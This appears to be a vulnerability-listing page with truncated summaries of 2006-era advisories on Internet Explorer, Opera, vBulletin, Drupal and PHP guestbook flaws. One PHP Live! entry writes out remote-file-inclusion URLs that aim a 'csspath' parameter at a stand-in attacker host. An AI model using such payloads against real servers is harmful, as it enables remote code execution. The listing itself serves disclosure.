CVE-2006-3450

CVE-2006-3450 corresponds to a memory-corruption vulnerability in Microsoft Internet Explorer (IE6/IE5 SP4) involving HTML layout and certain layout-positioning combinations. The root cause is improper handling of CSS/class-related content (e.g., document.getElementByID usage) which could allow r...

CVE-2006-3450

Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using the document.getElementByID Javascript function to access crafted Cascading Style Sheet CSS elements, and possibly other unspecified vectors involving certain layout positioning combinations in an HTML file...

CVE-2006-3451

CVE-2006-3451 is a remote code execution vulnerability in Microsoft Internet Explorer 5 SP4 and 6 caused by how chained CSS imports are handled during garbage collection, which can corrupt memory when a user views a crafted page. Exploitation could allow arbitrary code execution on an affected Wi...

Microsoft Internet Explorer Multiple CSS Imports Memory Corruption Vulnerability

This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific flaw exists due to improper garbage collection when...

Microsoft Internet Explorer CSS Class Ordering Memory Corruption Vulnerability

This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The specific vulnerability exists due to improper handling of CSS...

Microsoft Internet Explorer fails to properly handle chained Cascading Style Sheets

Overview Microsoft Internet Explorer fails to properly handle chained Cascading Style Sheets CSS. This can allow a remote attacker to execute arbitrary code on a vulnerable system. Description CSS is a mechanism for adding style to web documents. Microsoft Internet Explorer contains a vulnerabili...

[Full-disclosure] [DRUPAL-SA-2006-011] Drupal 4.7.3 / 4.6.9 fixes XSS issue

---------------------------------------------------------------------------- Drupal security advisory DRUPAL-SA-2006-011 ---------------------------------------------------------------------------- Advisory ID: DRUPAL-SA-2006-011 Project: Drupal core Date: 2006-Aug-02 Security risk: less critical...

CVE-2006-3945

The CSS functionality in Opera 9 on Windows XP SP2 allows remote attackers to cause a denial of service crash by setting the background property of a DHTML element to a long http or https URL, which triggers memory corruption...

CVE-2006-3945

CVE-2006-3945 affects Opera 9 on Windows XP SP2. The vulnerability arises in the CSS functionality where setting the background property of a DHTML element to a long http(s) URL triggers memory corruption, leading to a denial of service (crash). The sources consistently describe this as a remote ...

CVE-2006-3945

The CSS functionality in Opera 9 on Windows XP SP2 allows remote attackers to cause a denial of service crash by setting the background property of a DHTML element to a long http or https URL, which triggers memory corruption...

MicroGuestBook Remote XSS Attack

.:. MicroGuestBook Remote XSS Bug .:. Date: ----- July 2006, 22 Product: -------- MicroGuestBook Latest Version Vendor: ------- http://www.phptoys.com Description: ------------ Micro guestbook is a MySQL based guestbook script with a CSS based attractive interface. It can store the name, date,...

PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================ PHP Live! ----------- Execution: help.php?csspath=htt://attacker setup/header.php?csspath=htt://attacker ----------- Vendor: At the moment, there are no solutions from the vendor...

The use of Sina, Sohu domain steering-vulnerability warning-the black bar safety net

Article author: light and shadow Sources of information: the Red wolf security group www.wolfexp.net） To 1. Sina blog is an unfiltered script That simple point of it, the previous time to engage google cheat time want to use sina domain name turning. Because the blog's pr value is generally high,...

PHPSimple Choose v0.3

PHPSimple Choose v0.3 Homepage: http://phpsimplechoose.sourceforge.net Description: Do you need to add some fun to your site? Look no further. With PHPSimpleChoose you can let your users input terms and have one randomly choosen. Every bit of text is changeable, and we are working on allowing you...

GuestbookXL 1.3

GuestbookXL 1.3 Homepage: http://phpscripts.byethost12.com/guestbook.php Description: This simple guestbook makes it possible to store messages from users. It stores the name, Email address when given as a mailto link and the message itself. It has 30 smileys at this moment, but other smileys are...

Code injection

Jelsoft vBulletin accepts uploads of Cascading Style Sheets CSS and processes them in a way that allows remote authenticated administrators to gain shell access by uploading a CSS file that contains PHP code, then selecting the file via the style chooser, which causes the PHP code to be executed...

CVE-2006-2335

Jelsoft vBulletin accepts uploads of Cascading Style Sheets CSS and processes them in a way that allows remote authenticated administrators to gain shell access by uploading a CSS file that contains PHP code, then selecting the file via the style chooser, which causes the PHP code to be executed...

CVE-2006-2335

Jelsoft vBulletin (CSS upload handling) is affected by a vulnerability where uploading a CSS file containing PHP code and selecting it via the style chooser can result in the PHP code being executed. The issue is described as enabling remote authenticated administrators to gain shell access throu...

CVE-2006-2335

Jelsoft vBulletin accepts uploads of Cascading Style Sheets CSS and processes them in a way that allows remote authenticated administrators to gain shell access by uploading a CSS file that contains PHP code, then selecting the file via the style chooser, which causes the PHP code to be executed...

vbulletin security Alert

---------------------------------------------------------- Discovered by: Aura ARIA - SECURITY TEAM Gr33t to: O.U.T.L.A.W & R@1D3N & Smok3r ----------------------------------------------------------- » Vendor: Vbulletin » Summary: vbulletin is a powerfull Forum System »Description An administrato...